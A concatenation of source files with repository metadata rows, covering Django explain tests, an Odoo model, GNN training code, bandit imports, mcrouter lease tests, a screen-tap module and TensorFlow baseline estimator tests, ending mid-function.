if connection.features.supported_explain_formats:
msg += ' Allowed formats: %s' % ', '.join(sorted(connection.features.supported_explain_formats))
with self.assertRaisesMessage(ValueError, msg):
Tag.objects.all().explain(format='does not exist')
@unittest.skipUnless(connection.vendor == 'postgresql', 'PostgreSQL specific')
def test_postgres_options(self):
qs = Tag.objects.filter(name='test')
test_options = [
{'COSTS': False, 'BUFFERS': True, 'ANALYZE': True},
{'costs': False, 'buffers': True, 'analyze': True},
{'verbose': True, 'timing': True, 'analyze': True},
{'verbose': False, 'timing': False, 'analyze': True},
{'summary': True},
]
if connection.features.is_postgresql_12:
test_options.append({'settings': True})
if connection.features.is_postgresql_13:
test_options.append({'analyze': True, 'wal': True})
for options in test_options:
with self.subTest(**options), transaction.atomic():
with CaptureQueriesContext(connection) as captured_queries:
qs.explain(format='text', **options)
self.assertEqual(len(captured_queries), 1)
for name, value in options.items():
option = '{} {}'.format(name.upper(), 'true' if value else 'false')
self.assertIn(option, captured_queries[0]['sql'])
@unittest.skipUnless(connection.vendor == 'mysql', 'MySQL specific')
def test_mysql_text_to_traditional(self):
# Ensure these cached properties are initialized to prevent queries for
# the MariaDB or MySQL version during the QuerySet evaluation.
connection.features.supported_explain_formats
with CaptureQueriesContext(connection) as captured_queries:
Tag.objects.filter(name='test').explain(format='text')
self.assertEqual(len(captured_queries), 1)
self.assertIn('FORMAT=TRADITIONAL', captured_queries[0]['sql'])
@unittest.skipUnless(connection.vendor == 'mysql', 'MariaDB and MySQL >= 8.0.18 specific.')
def test_mysql_analyze(self):
qs = Tag.objects.filter(name='test')
with CaptureQueriesContext(connection) as captured_queries:
qs.explain(analyze=True)
self.assertEqual(len(captured_queries), 1)
prefix = 'ANALYZE ' if connection.mysql_is_mariadb else 'EXPLAIN ANALYZE '
self.assertTrue(captured_queries[0]['sql'].startswith(prefix))
with CaptureQueriesContext(connection) as captured_queries:
qs.explain(analyze=True, format='JSON')
self.assertEqual(len(captured_queries), 1)
if connection.mysql_is_mariadb:
self.assertIn('FORMAT=JSON', captured_queries[0]['sql'])
else:
self.assertNotIn('FORMAT=JSON', captured_queries[0]['sql'])
@skipIfDBFeature('supports_explaining_query_execution')
class ExplainUnsupportedTests(TestCase):
def test_message(self):
msg = 'This backend does not support explaining query execution.'
with self.assertRaisesMessage(NotSupportedError, msg):
Tag.objects.filter(name='test').explain()
| 49.903846 | 109 | 0.658382 |
4a22659903f929a46406799eb3d235789cf304f2 | 162 | py | Python | modulo6/herencia_website/models/product.py | odooerpdevelopers/cuso-odoo12-frontend | e93c23d79465565b8f297c4702aeb3698d15d9e7 | ["MIT"] | 1 | 2021-07-23T22:02:27.000Z | 2021-07-23T22:02:27.000Z | modulo6/herencia_website/models/product.py | odooerpdevelopers/curso-odoo12-frontend | e93c23d79465565b8f297c4702aeb3698d15d9e7 | ["MIT"] | null | null | null | modulo6/herencia_website/models/product.py | odooerpdevelopers/curso-odoo12-frontend | e93c23d79465565b8f297c4702aeb3698d15d9e7 | ["MIT"] | null | null | null |
from odoo import fields, models
class Product(models.Model):
_inherit = "product.template"
description_2 = fields.Html(string="Descripcion Extendida")
| 20.25 | 63 | 0.746914 |
4a226633275f2886da747bd74f650f2fbd8d1c42 | 2,657 | py | Python | train/train_SBMs_node_classification.py | ChaofanTao/litegt | 65c8d9ee9a2b9dcc1de9f39df7e9a8af5b69c1d8 | ["MIT"] | 5 | 2021-10-04T07:35:15.000Z | 2022-03-28T05:38:38.000Z | train/train_SBMs_node_classification.py | ChaofanTao/litegt | 65c8d9ee9a2b9dcc1de9f39df7e9a8af5b69c1d8 | ["MIT"] | null | null | null | train/train_SBMs_node_classification.py | ChaofanTao/litegt | 65c8d9ee9a2b9dcc1de9f39df7e9a8af5b69c1d8 | ["MIT"] | null | null | null |
"""
Utility functions for training one epoch
and evaluating one epoch
"""
import torch
import torch.nn as nn
import math
import dgl
from tqdm import tqdm
from train.metrics import accuracy_SBM as accuracy
def train_epoch(model, optimizer, device, data_loader, epoch):
model.train()
epoch_loss = 0
epoch_train_acc = 0
nb_data = 0
gpu_mem = 0
pbar = tqdm(enumerate(data_loader))
for iter, (batch_graphs, batch_labels) in pbar:
        pbar.set_description("batch id %d" % iter)
batch_graphs = batch_graphs.to(device)
batch_x = batch_graphs.ndata['feat'].to(device) # num x feat
batch_e = batch_graphs.edata['feat'].to(device)
batch_labels = batch_labels.to(device)
optimizer.zero_grad()
try:
batch_lap_pos_enc = batch_graphs.ndata['lap_pos_enc'].to(device)
sign_flip = torch.rand(batch_lap_pos_enc.size(1)).to(device)
sign_flip[sign_flip>=0.5] = 1.0; sign_flip[sign_flip<0.5] = -1.0
batch_lap_pos_enc = batch_lap_pos_enc * sign_flip.unsqueeze(0)
except:
batch_lap_pos_enc = None
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_lap_pos_enc)
loss = model.loss(batch_scores, batch_labels)
loss.backward()
optimizer.step()
epoch_loss += loss.detach().item()
acc = accuracy(batch_scores, batch_labels)
epoch_train_acc += acc
pbar.set_postfix({'loss':loss.item(),'acc':acc})
epoch_loss /= (iter + 1)
epoch_train_acc /= (iter + 1)
return epoch_loss, epoch_train_acc, optimizer
def evaluate_network(model, device, data_loader, epoch):
model.eval()
epoch_test_loss = 0
epoch_test_acc = 0
nb_data = 0
with torch.no_grad():
for iter, (batch_graphs, batch_labels) in enumerate(data_loader):
batch_graphs = batch_graphs.to(device)
batch_x = batch_graphs.ndata['feat'].to(device)
batch_e = batch_graphs.edata['feat'].to(device)
batch_labels = batch_labels.to(device)
try:
batch_lap_pos_enc = batch_graphs.ndata['lap_pos_enc'].to(device)
except:
batch_lap_pos_enc = None
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_lap_pos_enc)
loss = model.loss(batch_scores, batch_labels)
epoch_test_loss += loss.detach().item()
epoch_test_acc += accuracy(batch_scores, batch_labels)
epoch_test_loss /= (iter + 1)
epoch_test_acc /= (iter + 1)
return epoch_test_loss, epoch_test_acc
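# Illustrative driver loop (a sketch, not part of the original benchmark):
# it only combines the two helpers above; the model, optimizer, device and
# DataLoaders are assumed to be built by the benchmark's main script.
def run_training(model, optimizer, device, train_loader, val_loader, n_epochs):
    for epoch in range(n_epochs):
        train_loss, train_acc, optimizer = train_epoch(
            model, optimizer, device, train_loader, epoch)
        val_loss, val_acc = evaluate_network(model, device, val_loader, epoch)
        print("epoch %d: train loss %.4f acc %.4f | val loss %.4f acc %.4f" %
              (epoch, train_loss, train_acc, val_loss, val_acc))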
| 34.506494 | 91 | 0.640572 |
4a2266d4966e2f5531f84dfc82c89d1efe85ff5c | 657 | py | Python | core.py | DilipA/BanditPlayground | 10b16d87c379655bf54a82a79939c71dbf0eb839 | ["MIT"] | 713 | 2015-01-03T03:50:35.000Z | 2022-03-22T11:11:44.000Z | python/core.py | levylll/BanditsBook | 67962387b55172a7edeb492f5ae3eaf0061edd38 | ["MIT"] | 8 | 2016-01-07T18:58:35.000Z | 2022-02-28T14:27:06.000Z | python/core.py | levylll/BanditsBook | 67962387b55172a7edeb492f5ae3eaf0061edd38 | ["MIT"] | 226 | 2015-01-02T11:27:38.000Z | 2022-03-09T04:09:43.000Z |
# Convenience functions
def ind_max(x):
m = max(x)
return x.index(m)
# Need access to random numbers
import random
# Definitions of bandit arms
from arms.adversarial import *
from arms.bernoulli import *
from arms.normal import *
# Definitions of bandit algorithms
from algorithms.epsilon_greedy.standard import *
from algorithms.epsilon_greedy.annealing import *
from algorithms.softmax.standard import *
from algorithms.softmax.annealing import *
from algorithms.ucb.ucb1 import *
from algorithms.ucb.ucb2 import *
from algorithms.exp3.exp3 import *
from algorithms.hedge.hedge import *
# # Testing framework
from testing_framework.tests import *
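# e.g. ind_max([0.1, 0.7, 0.2]) == 1; the algorithms imported above typically
# use it to select the arm with the highest estimated value.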
| 25.269231 | 49 | 0.794521 |
4a2267cae487b86e6e79031b848458e4d278e6e6 | 2,655 | py | Python | third-party/mcrouter/src/mcrouter/test/test_lease_pairing.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | ["PHP-3.01", "Zend-2.0"] | 4 | 2015-10-02T13:45:18.000Z | 2020-07-31T13:01:34.000Z | third-party/mcrouter/src/mcrouter/test/test_lease_pairing.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | ["PHP-3.01", "Zend-2.0"] | 3 | 2015-11-19T07:34:27.000Z | 2016-07-28T23:25:45.000Z | third-party/mcrouter/src/mcrouter/test/test_lease_pairing.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | ["PHP-3.01", "Zend-2.0"] | 8 | 2015-10-24T00:07:59.000Z | 2021-04-08T10:58:30.000Z |
# Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.MCProcess import Memcached, McrouterClients
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestLeasePairing(McrouterTestCase):
config = './mcrouter/test/test_lease_pairing.json'
def create_mcrouter(self, extra_args=[]):
extra_args += ['--proxy-threads', '2']
self.memcached1 = self.add_server(Memcached())
self.memcached2 = self.add_server(Memcached())
self.mcrouter = self.add_mcrouter(self.config,
extra_args=extra_args)
self.clients = McrouterClients(self.mcrouter.port, 2)
def test_lease_pairing_enabled(self):
        # The lease-get and its corresponding lease-set
        # should go to the same server.
self.create_mcrouter(extra_args=['--enable-lease-pairing'])
# kill memcached1
self.memcached1.pause()
# lease get - should go to memcache2
get_reply = self.clients[0].leaseGet("key")
self.assertTrue(get_reply is not None)
# bring memcached1 up
self.memcached1.resume()
# lease set should go to the same server as lease get - memcache2
set_reply = self.clients[1].leaseSet("key",
{"value": "abc", "token": get_reply['token']})
self.assertTrue(set_reply is not None)
self.assertTrue(self.memcached1.get("key") is None)
self.assertTrue(self.memcached2.get("key") is not None)
def test_lease_pairing_disabled(self):
        # With lease pairing disabled, the lease-set is routed independently
        # and may go to a different server than the one that served the lease-get.
self.create_mcrouter()
# kill memcached1
self.memcached1.pause()
# lease get - should go to memcache2
get_reply = self.clients[0].leaseGet("key")
self.assertTrue(get_reply is not None)
# bring memcached1 up
self.memcached1.resume()
# lease set should go to memcache1
set_reply = self.clients[1].leaseSet("key",
{"value": "abc", "token": get_reply['token']})
self.assertTrue(set_reply is not None)
self.assertTrue(self.memcached1.get("key") is not None)
self.assertTrue(self.memcached2.get("key") is None)
| 36.369863 | 77 | 0.666667 |
4a2267ecc091949cd34ae5cd72f472d52faa414e | 763 | py | Python | src/com/python/demo/helloPython.py | Leeo1124/pythonDemo | 72e2209c095301a3f1f61edfe03ea69c3c05be40 | ["Apache-2.0"] | null | null | null | src/com/python/demo/helloPython.py | Leeo1124/pythonDemo | 72e2209c095301a3f1f61edfe03ea69c3c05be40 | ["Apache-2.0"] | null | null | null | src/com/python/demo/helloPython.py | Leeo1124/pythonDemo | 72e2209c095301a3f1f61edfe03ea69c3c05be40 | ["Apache-2.0"] | null | null | null |
# Output
print('hello python!')
print(100 + 200 + 300)
print('100 + 200 =', 100 + 200)
print("adfa")
print('The quick brown fox', 'jumps over', 'the lazy dog')
# Input
#name = input('please enter your name: ')
#print('hello',name)
# In an r'' raw string, backslashes inside the quotes are not treated as escapes
print(r'\\\t\\')
# Use the '''...''' form for multi-line content
print('''line1
line2
line3''')
print(r'''\\\t\\line1
line2
line3''')
print(True and True)
print(True or True)
print(not True)
print(10 / 3)
print(10 // 3)
print(ord('A'))
print(ord('中'))
print(chr(66))
print(chr(25991))
# bytes literals are written with single or double quotes prefixed by b
print('ABC'.encode('ascii'))
print(b'ABC'.decode('ascii'))
# len() counts characters for a str; for bytes it counts the number of bytes
print(len('中文'))
print(len(b'ABC'))
print(len('中文'.encode('utf-8')))
print('Hi, %s, you have $%d.' % ('Michael', 1000000))
| 16.955556 | 58 | 0.639581 |
4a2268d7e47266c1c75147e12ce9280313ad0ac6 | 1,730 | py | Python | modules/click.py | justdanofficial/Ghost | a95f166a6bb706a39fb0f2f5689a364bca47e78b | ["MIT"] | 1 | 2021-06-20T23:43:25.000Z | 2021-06-20T23:43:25.000Z | modules/click.py | justdanofficial/Ghost | a95f166a6bb706a39fb0f2f5689a364bca47e78b | ["MIT"] | null | null | null | modules/click.py | justdanofficial/Ghost | a95f166a6bb706a39fb0f2f5689a364bca47e78b | ["MIT"] | null | null | null |
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.badges import Badges
class GhostModule:
def __init__(self, ghost):
self.ghost = ghost
self.badges = Badges()
self.details = {
'name': "click",
'authors': ['jaxparrow07'],
            'description': "Taps the device screen at the specified x and y coordinates.",
'usage': "click <x> <y>",
'type': "managing",
'args': 2,
'needs_args': True,
'needs_root': False,
'comments': ""
}
def run(self, args):
self.ghost.send_command("shell", "\"input tap " + args + "\"", True)
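        # e.g. run("540 960") sends the device shell command: input tap 540 960
        # (the coordinates are illustrative)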
| 35.306122 | 80 | 0.672254 |
4a22690f71f3c3746f35f7c9dd5681070c9875ce | 54,761 | py | Python | tensorflow_estimator/python/estimator/canned/baseline_test.py | tirkarthi/estimator | 5d962124f1c2ad5b2886ada53d5c604257b660b6 | ["Apache-2.0"] | null | null | null | tensorflow_estimator/python/estimator/canned/baseline_test.py | tirkarthi/estimator | 5d962124f1c2ad5b2886ada53d5c604257b660b6 | ["Apache-2.0"] | null | null | null | tensorflow_estimator/python/estimator/canned/baseline_test.py | tirkarthi/estimator | 5d962124f1c2ad5b2886ada53d5c604257b660b6 | ["Apache-2.0"] | null | null | null |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for baseline.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
import shutil
import tempfile
import tensorflow as tf
import numpy as np
import six
from tensorflow.core.example import example_pb2
from tensorflow.core.example import feature_pb2
from tensorflow.python.client import session as tf_session
from tensorflow.python.feature_column import feature_column_v2 as feature_column_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.summary.writer import writer_cache
from tensorflow.python.training import checkpoint_utils
from tensorflow.python.training import input as input_lib
from tensorflow.python.training import queue_runner
from tensorflow.python.training import saver
from tensorflow_estimator.python.estimator.canned import baseline
from tensorflow_estimator.python.estimator.canned import metric_keys
from tensorflow_estimator.python.estimator.export import export
from tensorflow_estimator.python.estimator.inputs import numpy_io
from tensorflow_estimator.python.estimator.inputs import pandas_io
try:
# pylint: disable=g-import-not-at-top
import pandas as pd
HAS_PANDAS = True
except IOError:
# Pandas writes a temporary file during import. If it fails, don't use pandas.
HAS_PANDAS = False
except ImportError:
HAS_PANDAS = False
# pylint rules which are disabled by default for test files.
# pylint: disable=invalid-name,protected-access,missing-docstring
# Names of variables created by model.
BIAS_NAME = 'baseline/bias'
def assert_close(expected, actual, rtol=1e-04, name='assert_close'):
with ops.name_scope(name, 'assert_close', (expected, actual, rtol)) as scope:
expected = ops.convert_to_tensor(expected, name='expected')
actual = ops.convert_to_tensor(actual, name='actual')
rdiff = tf.math.abs(expected - actual, 'diff') / tf.math.abs(expected)
rtol = ops.convert_to_tensor(rtol, name='rtol')
return tf.compat.v1.debugging.assert_less(
rdiff,
rtol,
data=('Condition expected =~ actual did not hold element-wise:'
'expected = ', expected, 'actual = ', actual, 'rdiff = ', rdiff,
'rtol = ', rtol,),
name=scope)
def save_variables_to_ckpt(model_dir):
init_all_op = [tf.compat.v1.initializers.global_variables()]
with tf.compat.v1.Session() as sess:
sess.run(init_all_op)
tf.compat.v1.train.Saver().save(sess, os.path.join(model_dir, 'model.ckpt'))
def queue_parsed_features(feature_map):
tensors_to_enqueue = []
keys = []
for key, tensor in six.iteritems(feature_map):
keys.append(key)
tensors_to_enqueue.append(tensor)
queue_dtypes = [x.dtype for x in tensors_to_enqueue]
input_queue = tf.queue.FIFOQueue(capacity=100, dtypes=queue_dtypes)
tf.compat.v1.train.queue_runner.add_queue_runner(
tf.compat.v1.train.queue_runner.QueueRunner(input_queue,
[input_queue.enqueue(tensors_to_enqueue)]))
dequeued_tensors = input_queue.dequeue()
return {keys[i]: dequeued_tensors[i] for i in range(len(dequeued_tensors))}
def sorted_key_dict(unsorted_dict):
return {k: unsorted_dict[k] for k in sorted(unsorted_dict)}
def sigmoid(x):
return 1 / (1 + np.exp(-1.0 * x))
def _baseline_regressor_fn(*args, **kwargs):
return baseline.BaselineRegressorV2(*args, **kwargs)
def _baseline_classifier_fn(*args, **kwargs):
return baseline.BaselineClassifierV2(*args, **kwargs)
def mock_optimizer_v2(testcase, expected_loss=None):
"""Creates a mock optimizer to test the train method.
Args:
testcase: A TestCase instance.
expected_loss: If given, will assert the loss value.
Returns:
A mock Optimizer.
"""
expected_var_names = ['%s:0' % BIAS_NAME]
class _Optimizer(optimizer_v2.OptimizerV2):
def get_updates(self, loss, params):
trainable_vars = params
testcase.assertItemsEqual(expected_var_names,
[var.name for var in trainable_vars])
# Verify loss. We can't check the value directly, so we add an assert op.
testcase.assertEquals(0, loss.shape.ndims)
if expected_loss is None:
if self.iterations is not None:
return [self.iterations.assign_add(1).op]
return [tf.no_op()]
assert_loss = assert_close(
tf.cast(expected_loss, name='expected', dtype=tf.dtypes.float32),
loss,
name='assert_loss')
with tf.control_dependencies((assert_loss,)):
if self.iterations is not None:
return [self.iterations.assign_add(1).op]
return [tf.no_op()]
def get_config(self):
config = super(_Optimizer, self).get_config()
return config
optimizer = _Optimizer(name='my_optimizer')
return optimizer
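# Illustrative usage sketch (added for clarity; not part of the original test
# suite). The mock optimizer is wired into an estimator so that train() fails
# fast if the graph-computed loss drifts from the hand-derived value:
#
#   optimizer = mock_optimizer_v2(testcase, expected_loss=25.)
#   est = _baseline_regressor_fn(model_dir=model_dir, optimizer=optimizer)
#   est.train(input_fn=lambda: ({'age': ((17,),)}, ((5.,),)), steps=10)
#
# With the bias still at zero the prediction is 0, so the squared loss for a
# label of 5 is (0 - 5)**2 = 25, which matches expected_loss above.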
# Tests for Baseline Regressor.
# TODO(b/36813849): Add tests with dynamic shape inputs using placeholders.
class BaselineRegressorEvaluationTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
tf.compat.v1.summary.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def test_evaluation_for_simple_data(self):
with tf.Graph().as_default():
tf.Variable([13.0], name=BIAS_NAME)
tf.Variable(
100, name=tf.compat.v1.GraphKeys.GLOBAL_STEP, dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(model_dir=self._model_dir)
eval_metrics = baseline_regressor.evaluate(
input_fn=lambda: ({'age': ((1,),)}, ((10.,),)), steps=1)
# Logit is bias = 13, while label is 10. Loss is 3**2 = 9.
self.assertDictEqual({
metric_keys.MetricKeys.LOSS: 9.,
metric_keys.MetricKeys.LOSS_MEAN: 9.,
metric_keys.MetricKeys.PREDICTION_MEAN: 13.,
metric_keys.MetricKeys.LABEL_MEAN: 10.,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100
}, eval_metrics)
def test_evaluation_batch(self):
"""Tests evaluation for batch_size==2."""
with tf.Graph().as_default():
tf.Variable([13.0], name=BIAS_NAME)
tf.Variable(
100, name=tf.compat.v1.GraphKeys.GLOBAL_STEP, dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(model_dir=self._model_dir)
eval_metrics = baseline_regressor.evaluate(
input_fn=lambda: ({'age': ((1,), (1,))}, ((10.,), (10.,))), steps=1)
# Logit is bias = 13, while label is 10.
# Loss per example is 3**2 = 9.
# Training loss is the sum over batch size = (9 + 9) / 2 = 9
# Average loss is the average over batch = 9
self.assertDictEqual({
metric_keys.MetricKeys.LOSS: 9.,
metric_keys.MetricKeys.LOSS_MEAN: 9.,
metric_keys.MetricKeys.PREDICTION_MEAN: 13.,
metric_keys.MetricKeys.LABEL_MEAN: 10.,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100
}, eval_metrics)
def test_evaluation_weights(self):
"""Tests evaluation with weights."""
with tf.Graph().as_default():
tf.Variable([13.0], name=BIAS_NAME)
tf.Variable(
100, name=tf.compat.v1.GraphKeys.GLOBAL_STEP, dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
def _input_fn():
features = {'age': ((1,), (1,)), 'weights': ((1.,), (2.,))}
labels = ((10.,), (10.,))
return features, labels
baseline_regressor = _baseline_regressor_fn(
weight_column='weights',
model_dir=self._model_dir)
eval_metrics = baseline_regressor.evaluate(input_fn=_input_fn, steps=1)
# Logit is bias = 13, while label is 10.
# Loss per example is 3**2 = 9.
# Training loss is the weighted sum over batch size = (9 + 2*9) / 2 = 13.5
# average loss is the weighted average = 9 + 2*9 / (1 + 2) = 9
self.assertDictEqual({
metric_keys.MetricKeys.LOSS: 13.5,
metric_keys.MetricKeys.LOSS_MEAN: 9.,
metric_keys.MetricKeys.PREDICTION_MEAN: 13.,
metric_keys.MetricKeys.LABEL_MEAN: 10.,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100
}, eval_metrics)
def test_evaluation_for_multi_dimensions(self):
label_dim = 2
with tf.Graph().as_default():
tf.Variable([46.0, 58.0], name=BIAS_NAME)
tf.Variable(100, name='global_step', dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(
label_dimension=label_dim,
model_dir=self._model_dir)
input_fn = numpy_io.numpy_input_fn(
x={
'age': np.array([[2., 4., 5.]]),
},
y=np.array([[46., 58.]]),
batch_size=1,
num_epochs=None,
shuffle=False)
eval_metrics = baseline_regressor.evaluate(input_fn=input_fn, steps=1)
self.assertItemsEqual(
(metric_keys.MetricKeys.LOSS, metric_keys.MetricKeys.LOSS_MEAN,
metric_keys.MetricKeys.PREDICTION_MEAN,
metric_keys.MetricKeys.LABEL_MEAN, tf.compat.v1.GraphKeys.GLOBAL_STEP),
eval_metrics.keys())
# Logit is bias which is [46, 58]
self.assertAlmostEqual(0, eval_metrics[metric_keys.MetricKeys.LOSS])
class BaselineRegressorPredictTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
tf.compat.v1.summary.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def test_1d(self):
"""Tests predict when all variables are one-dimensional."""
with tf.Graph().as_default():
tf.Variable([.2], name=BIAS_NAME)
tf.Variable(100, name='global_step', dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(model_dir=self._model_dir)
predict_input_fn = numpy_io.numpy_input_fn(
x={'x': np.array([[2.]])},
y=None,
batch_size=1,
num_epochs=1,
shuffle=False)
predictions = baseline_regressor.predict(input_fn=predict_input_fn)
predicted_scores = list([x['predictions'] for x in predictions])
    # The baseline model ignores the 'x' feature, so the prediction is just the bias: 0.2.
self.assertAllClose([[.2]], predicted_scores)
def testMultiDim(self):
"""Tests predict when all variables are multi-dimenstional."""
batch_size = 2
label_dimension = 3
with tf.Graph().as_default():
tf.Variable( # shape=[label_dimension]
[.2, .4, .6], name=BIAS_NAME)
tf.Variable(100, name='global_step', dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(
label_dimension=label_dimension,
model_dir=self._model_dir)
predict_input_fn = numpy_io.numpy_input_fn(
# x shape=[batch_size, x_dim]
x={'x': np.array([[1., 2., 3., 4.], [5., 6., 7., 8.]])},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
predictions = baseline_regressor.predict(input_fn=predict_input_fn)
predicted_scores = list([x['predictions'] for x in predictions])
# score = bias, shape=[batch_size, label_dimension]
self.assertAllClose([[0.2, 0.4, 0.6], [0.2, 0.4, 0.6]],
predicted_scores)
class BaselineRegressorIntegrationTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
tf.compat.v1.summary.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def _test_complete_flow(self, train_input_fn, eval_input_fn, predict_input_fn,
input_dimension, label_dimension, prediction_length):
feature_columns = [
tf.feature_column.numeric_column('x', shape=(input_dimension,))
]
est = _baseline_regressor_fn(
label_dimension=label_dimension,
model_dir=self._model_dir)
# TRAIN
# learn y = x
est.train(train_input_fn, steps=200)
    # EVALUATE
scores = est.evaluate(eval_input_fn)
self.assertEqual(200, scores[tf.compat.v1.GraphKeys.GLOBAL_STEP])
self.assertIn(metric_keys.MetricKeys.LOSS, six.iterkeys(scores))
# PREDICT
predictions = np.array(
[x['predictions'] for x in est.predict(predict_input_fn)])
self.assertAllEqual((prediction_length, label_dimension), predictions.shape)
# EXPORT
feature_spec = tf.feature_column.make_parse_example_spec(
feature_columns)
serving_input_receiver_fn = export.build_parsing_serving_input_receiver_fn(
feature_spec)
export_dir = est.export_saved_model(tempfile.mkdtemp(),
serving_input_receiver_fn)
self.assertTrue(tf.compat.v1.gfile.Exists(export_dir))
def test_numpy_input_fn(self):
"""Tests complete flow with numpy_input_fn."""
label_dimension = 2
input_dimension = label_dimension
batch_size = 10
prediction_length = batch_size
data = np.linspace(0., 2., batch_size * label_dimension, dtype=np.float32)
data = data.reshape(batch_size, label_dimension)
train_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=data,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
eval_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=data,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
predict_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
self._test_complete_flow(
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=input_dimension,
label_dimension=label_dimension,
prediction_length=prediction_length)
def test_pandas_input_fn(self):
"""Tests complete flow with pandas_input_fn."""
if not HAS_PANDAS:
return
    # Pandas DataFrame naturally supports 1 dim data only.
label_dimension = 1
input_dimension = label_dimension
batch_size = 10
data = np.array([1., 2., 3., 4.], dtype=np.float32)
x = pd.DataFrame({'x': data})
y = pd.Series(data)
prediction_length = 4
train_input_fn = pandas_io.pandas_input_fn(
x=x, y=y, batch_size=batch_size, num_epochs=None, shuffle=True)
eval_input_fn = pandas_io.pandas_input_fn(
x=x, y=y, batch_size=batch_size, shuffle=False)
predict_input_fn = pandas_io.pandas_input_fn(
x=x, batch_size=batch_size, shuffle=False)
self._test_complete_flow(
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=input_dimension,
label_dimension=label_dimension,
prediction_length=prediction_length)
def test_input_fn_from_parse_example(self):
"""Tests complete flow with input_fn constructed from parse_example."""
label_dimension = 2
input_dimension = label_dimension
batch_size = 10
prediction_length = batch_size
data = np.linspace(0., 2., batch_size * label_dimension, dtype=np.float32)
data = data.reshape(batch_size, label_dimension)
serialized_examples = []
for datum in data:
example = example_pb2.Example(features=feature_pb2.Features(
feature={
'x':
feature_pb2.Feature(float_list=feature_pb2.FloatList(
value=datum)),
'y':
feature_pb2.Feature(float_list=feature_pb2.FloatList(
value=datum[:label_dimension])),
}))
serialized_examples.append(example.SerializeToString())
feature_spec = {
'x': tf.io.FixedLenFeature([input_dimension], tf.dtypes.float32),
'y': tf.io.FixedLenFeature([label_dimension], tf.dtypes.float32),
}
def _train_input_fn():
feature_map = tf.compat.v1.io.parse_example(serialized_examples, feature_spec)
features = queue_parsed_features(feature_map)
labels = features.pop('y')
return features, labels
def _eval_input_fn():
feature_map = tf.compat.v1.io.parse_example(
